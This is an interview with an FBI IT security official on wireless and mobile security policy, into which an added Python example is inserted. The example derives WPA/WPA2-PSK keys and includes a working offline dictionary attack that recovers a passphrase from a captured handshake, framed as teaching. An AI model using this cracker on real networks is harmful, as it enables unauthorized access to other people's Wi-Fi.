There is always a storm on the wireless security front. Robby Ann Hamlin's job, as unit chief in the FBI's department of IT security, is keeping those thunderheads at bay. The former federal police officer and security professional is responsible for securing the FBI's field offices and mobile agents against digital threats. She took some time to answer our questions about wireless security.
What drove you to focus on IT security?
After two years as a federal police officer, I aspired to be a security professional supporting all domains of security. I spent seven years as a federal employee establishing subject matter expertise in the areas of physical, personnel protection, personnel, and computer security. Through the years, it became obvious that practically all information and access controls are processed, controlled and stored within information technology equipment. Therefore, I focused on the discipline I deemed most challenging and evolving--information technology security. As we "peel the onion," taking a defense-in-depth approach to security, the layers of personnel, physical, and technical security surround the IT that stores, processes and transmits our information. Securing the technology for protection of data at rest and data in transit is where I have focused my attention for the past 10 years.
How do you secure the FBI's mobile users and field agents?
Education is our first line of defense. We have to ensure our employees are aware of technological vulnerabilities inherent within the devices they use--Bluetooth is a transmission capability in many new cell phones, PDAs and laptops and almost always enabled by default from the manufacturer. This capability renders a device vulnerable to wireless intercept--transparent to the user. In addition to the concern over compromise, removal or unavailability of our critical or sensitive information, mobile computing devices have also become the new frontier for viruses, spamming and telemarketers.
There are many security tools, capabilities and procedures available to secure information on mobile computing devices and many are evaluated and used throughout the U.S. Government for protection of "Sensitive But Unclassified" (SBU) information. However, technologies used for the protection of classified national security and intelligence information are authorized through policies and standards set forth or specific approval from the DCI, NSA, NIST, FIPS or other specific U.S. Government guidelines. The challenge for all is awaiting U.S. Government approved standards and security technologies that maintain pace with emerging technologies…virtually impossible.
The FBI is currently researching technologies that implement technical controls, such as "freezing" the baseline configuration of a device, allowing the user to invoke and process only what is allowed and technically preventing what is not allowed. Based on the business need and level of protection required for the information to be processed, there are products that allow relatively relaxed security within authorized work spaces, but automatically invoke very stringent security policies when accessing networks or databases when the user and device are external to authorized work spaces. This ensures the mobile computer is "locked" into a pristine, secure configuration, prohibiting user intervention or alteration, even when the device is removed from a secure work environment. In addition, we are researching technologies that provide technical access controls, encryption for data at rest and in transmission, and intrusion prevention for mobile computing devices, over traditional functions that have relied on administrative (human) controls to eliminate the risk of access to the data.
What marked improvements have you seen in the security industry through the changing wireless encryption standards?
The rapid changes in the standards make it very difficult for large organizations to adopt wireless networking. Some stability would increase the chance for successful integration with existing networks. However, there are certainly existing solutions that can be engineered into systems today that provide high levels of security for the protection of our unclassified, sensitive and classified information. Because of the physical nature of the wireless media (unlicensed RF spectrum) there will always be availability issues with existing technology. We should not rely on high availability of systems operating solely in a wireless environment. Systems processing critical and/or sensitive information, when availability and reliability are of utmost importance to operations or protection of data assets, should always have a wired or hard line back-up.
What trends do you see for the mobile security industry with the increasing occurrence of employees working offsite?
This will increase significantly, and already has through BlackBerry technology and wireless NIC cards. We have the ability to communicate anytime and anywhere in a timely, seamless manner. There's no need to be in the office anymore--unless you're working with or discussing classified information, where national policy places strict requirements on the protection of that information, and even this need is quickly moving into a mobile computing environment. In addition, let us not forget the portability and small (and getting smaller) size of these mobile devices, making them an easy target for theft and loss.
What recommendations can you make for enterprise CSOs who are struggling with enforcing a mobile security policy?
Educate users on technologies and the vulnerabilities associated with those technologies, maintain current policies, and encourage users to consider where they place critical information, where they send it and how. Just as we rely on and trust a sealed envelope and the U.S. Postal Service to protect payment transactions, letters, etc., we also need to consider the reliability and protection of the technology we use to protect the same information when it is transmitted electronically and stored in portable, mobile computing devices.
What's the bigger mobile security challenge--rogue devices/access points or securely configuring devices?
As technology emerges, increasing speed, convenience, ease of use to communicate, process and store our information, the vulnerabilities increase. One must think like the bad guy in order to consider all the options of accessing, corrupting, or rendering data unavailable. Examples--Bluetooth surfing in public coffee establishments or obtaining free Internet service by hopping on your neighbor's unprotected wireless home network. Because of the popularity of wireless systems, the ability to control whom one connects to is a huge challenge. Once again, technical security solutions combined with education and policies/procedures have great promise in reducing the risk of unauthorized connections rather than simply decreeing that wireless is too vulnerable, or expecting that users will obey the rules to not connect their computers through unauthorized access points or other wired networks.
Security managers are supposed to be business enablers. In that regard, do you still find yourself struggling with authorizing wireless initiatives?
Yes. National policy will likely take a more risk avoidance versus a risk managed approach due to the difficulty in creating preventive security measures against new technologies. We simply cannot keep up. Saying "No" to requests to use new technologies is not the answer. We must ask the users what their requirements are and what technologies they'd like to use, and we as security professionals will work to secure it. If we can't, we consider alternatives.
Putting it into a realistic perspective, technology and eagerness to use wireless capabilities are not the problem. Gaining a genuine understanding of an organization's business needs that can best or only be served by a wireless solution seems to be the issue. In all honesty, there is some amount of "fun factor" in many requests for the use of wireless capabilities, in addition to very legitimate, time and life saving critical requirements. Currently we find that when we carefully examine these requests, they are better served and more secure using wired solutions. Wireless solutions require a completely new set of logistical support, and managers have a propensity to attempt to incorporate wireless and fail to properly fund the support and security requirements. This shortfall, unfortunately, often goes unnoticed until problems occur (the device or data is compromised or accessed by unauthorized users) that cause the issue to leap into the spotlight, where the lack of proper security engineering and support becomes very clear.
Do enterprises underestimate the security risks associated with wireless?
Absolutely. Most enterprise security managers are not familiar enough with all of the new technologies to know where the vulnerabilities exist. The problem arises from not having standard, U.S. Government-approved wireless projects that include security, which results in "ad hoc" solutions being placed into service that can be made to work, by well-intentioned engineers who have not included an adequate security solution in the initial design and engineering efforts. Security is always more expensive "after the fact."
What security improvements have you seen through the changing encryption standards?
The standards are not the issue--there are choices available today that meet security requirements. The authority/ability to select a standard, and then build around it as the corporate solution, is always difficult in any large organization. Once the "standard" is established, those people who are charged with implementation will do their best to abide by the policies and directives. This also speaks to the funding for adequate support for the requirements.
WPA addresses all known vulnerabilities in WEP, the original, less secure 40- or 104-bit encryption scheme in the IEEE 802.11 standard. WPA also provides user authentication, since WEP offers no real means of authenticating users. Designed to secure present and future versions of IEEE 802.11 devices, WPA implements a subset of the then-draft IEEE 802.11i specification.
WPA replaces WEP with a stronger encryption technology called Temporal Key Integrity Protocol (TKIP) with a Message Integrity Check (MIC). It also provides a scheme of mutual authentication using either IEEE 802.1X/Extensible Authentication Protocol (EAP) authentication or pre-shared key (PSK) technology. WPA2 is based upon the Institute of Electrical and Electronics Engineers' (IEEE) 802.11i amendment to the 802.11 standard, which was ratified on July 29, 2004. The primary difference between WPA and WPA2 is that WPA2 uses a stronger encryption technique, AES (Advanced Encryption Standard) in CCMP mode, allowing for compliance with FIPS 140-2 government security requirements.
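The pre-shared key (PSK) mode mentioned above is where most small-office and home deployments live, and its security rests entirely on the passphrase. The following Python is an added worked example, not code from the interview or the FBI: it walks the WPA/WPA2-Personal key hierarchy as IEEE 802.11i specifies it (passphrase and SSID stretched with PBKDF2-HMAC-SHA1 into the 256-bit PSK, the PSK expanded with the 802.11i PRF into the pairwise transient key, and the handshake's EAPOL MIC computed from the resulting KCK), then shows why that matters by running an offline dictionary attack against a captured handshake. The MAC addresses, nonces and EAPOL frame are constructed placeholders, not a real capture; the only real test vector is the `"password"`/`"IEEE"` PSK from the standard's Annex H.

```python
import hashlib
import hmac

# Constants from IEEE 802.11i (WPA/WPA2-Personal key hierarchy).
PSK_ITERATIONS = 4096                # PBKDF2 iteration count for passphrase -> PSK
PSK_LEN = 32                         # 256-bit PSK, used directly as the PMK
PTK_LEN = {"ccmp": 48, "tkip": 64}   # PRF-384 for WPA2/AES-CCMP, PRF-512 for WPA/TKIP


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> 256-bit PSK.

    A 64-character hex string is already a raw PSK and is used as-is; anything
    else must be 8..63 printable ASCII characters and is stretched with
    PBKDF2-HMAC-SHA1 using the SSID as salt and 4096 iterations.
    """
    if len(passphrase) == 64:
        try:
            return bytes.fromhex(passphrase)
        except ValueError:
            pass  # not hex: fall through to the passphrase rules (which reject 64 chars)
    if not 8 <= len(passphrase) <= 63 or not all(32 <= ord(c) <= 126 for c in passphrase):
        raise ValueError("WPA passphrase must be 8..63 printable ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PSK_ITERATIONS, PSK_LEN)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range((nbytes + 19) // 20)
    )
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               cipher: str = "ccmp") -> dict:
    """Pairwise Transient Key from the 4-way handshake inputs.

    KCK (16 bytes) protects the handshake's EAPOL MIC, KEK (16) wraps the group
    key, TK (16) encrypts data frames; TKIP additionally derives two 8-byte
    Michael MIC keys. The min/max ordering makes the result the same whichever
    side's address or nonce is passed first.
    """
    if len(aa) != 6 or len(spa) != 6 or len(anonce) != 32 or len(snonce) != 32:
        raise ValueError("expected 6-byte MAC addresses and 32-byte nonces")
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, PTK_LEN[cipher])
    keys = {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}
    if cipher == "tkip":
        keys["mic_tx"], keys["mic_rx"] = ptk[48:56], ptk[56:64]
    return keys


def eapol_mic(kck: bytes, eapol_frame: bytes, cipher: str = "ccmp") -> bytes:
    """EAPOL-Key MIC: HMAC-MD5 for WPA/TKIP, HMAC-SHA1 truncated to 128 bits for WPA2/CCMP.
    The frame's own MIC field must be zeroed before this is computed."""
    digest = hashlib.md5 if cipher == "tkip" else hashlib.sha1
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def crack_psk(candidates, ssid, aa, spa, anonce, snonce, eapol_frame, captured_mic,
              cipher="ccmp"):
    """Offline dictionary attack on a captured 4-way handshake.

    Every input except the passphrase travels in the clear, so for each
    candidate we recompute PSK -> PTK -> KCK and compare the EAPOL MIC.
    Returns the matching passphrase, or None if no candidate matches.
    """
    for candidate in candidates:
        try:
            pmk = derive_psk(candidate, ssid)
        except ValueError:
            continue  # candidate is not a legal WPA passphrase
        kck = derive_ptk(pmk, aa, spa, anonce, snonce, cipher)["kck"]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame, cipher), captured_mic):
            return candidate
    return None


# Constructed demo values (not a real capture): AP with SSID "IEEE" using passphrase "password".
AP_MAC = bytes.fromhex("00c0ca000001")
STA_MAC = bytes.fromhex("00c0ca000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = bytes.fromhex("0103") + b"\x00" * 119   # placeholder EAPOL-Key frame, MIC field zeroed


def demo() -> str:
    """Build the MIC a legitimate station would send, then recover the passphrase from it."""
    pmk = derive_psk("password", "IEEE")
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)["kck"]
    mic = eapol_mic(kck, EAPOL_MSG2)
    wordlist = ["letmein1", "password", "correcthorse"]
    return crack_psk(wordlist, "IEEE", AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, mic)


if __name__ == "__main__":
    print("PSK(password, IEEE) =", derive_psk("password", "IEEE").hex())
    print("recovered passphrase:", demo())
```

Two practical points follow from the code. The SSID is the only salt, so a common SSID with a dictionary passphrase is precomputable in bulk; a unique SSID and a long random passphrase (or a 64-hex raw PSK) is what actually raises the attacker's cost. And the attacker needs no further interaction with the network after capturing one handshake, which is why the interview's emphasis on 802.1X/EAP for anything sensitive is well placed.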
How does the increasing number of remote employees change the wireless security forecast?
It will only increase as more and more organizations support and encourage telecommuting. Our challenge is to provide secure solutions for those who will engage in remote connectivity. History has shown us that if we don't provide users with a secure (or any) solution… they will develop one for themselves, which will technically function for connectivity, but will almost certainly not be a secure solution. It is incumbent on those of us in the security field to provide these solutions to the users, before technical evolution overwhelms us with home grown solutions that give them the connectivity they need, but introduce great risk to the parent organization.
Editor's note: Ms. Hamlin has since left the FBI for the position of Senior Vice President and CISO of PI-CORESEC.